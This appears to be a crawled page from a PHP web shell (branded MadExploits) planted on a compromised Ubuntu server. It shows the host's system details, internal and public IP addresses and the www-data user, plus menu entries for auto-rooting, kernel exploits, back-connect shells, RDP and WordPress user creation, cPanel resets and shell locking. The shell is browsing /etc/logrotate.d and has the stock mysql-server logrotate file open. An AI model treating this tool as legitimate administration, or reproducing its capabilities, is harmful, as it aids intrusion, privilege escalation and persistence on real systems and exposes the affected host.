Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.14.244.90
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
120
B
-rw-r--r--
apache2
442
B
-rw-r--r--
apport
126
B
-rw-r--r--
apt
173
B
-rw-r--r--
certbot
82
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
lxd
146
B
-rw-r--r--
mysql-server
845
B
-rw-r--r--
netdata
221
B
-rw-r--r--
rsyslog
501
B
-rw-r--r--
ubuntu-advantage-tools
119
B
-rw-r--r--
ufw
178
B
-rw-r--r--
unattended-upgrades
235
B
-rw-r--r--
waagent.logrotate
92
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql-server
# - I put everything in one block and added sharedscripts, so that mysql gets # flush-logs'd only once. # Else the binary logs would automatically increase by n times every day. # - The error log is obsolete, messages go to syslog now. /var/log/mysql.log /var/log/mysql/*log { daily rotate 7 missingok create 640 mysql adm compress sharedscripts postrotate test -x /usr/bin/mysqladmin || exit 0 # If this fails, check debian.conf! MYADMIN="/usr/bin/mysqladmin --defaults-file=/etc/mysql/debian.cnf" if [ -z "`$MYADMIN ping 2>/dev/null`" ]; then # Really no mysqld or rather a missing debian-sys-maint user? # If this occurs and is not a error please report a bug. #if ps cax | grep -q mysqld; then if killall -q -s0 -umysql mysqld; then exit 1 fi else $MYADMIN flush-logs fi endscript }
Close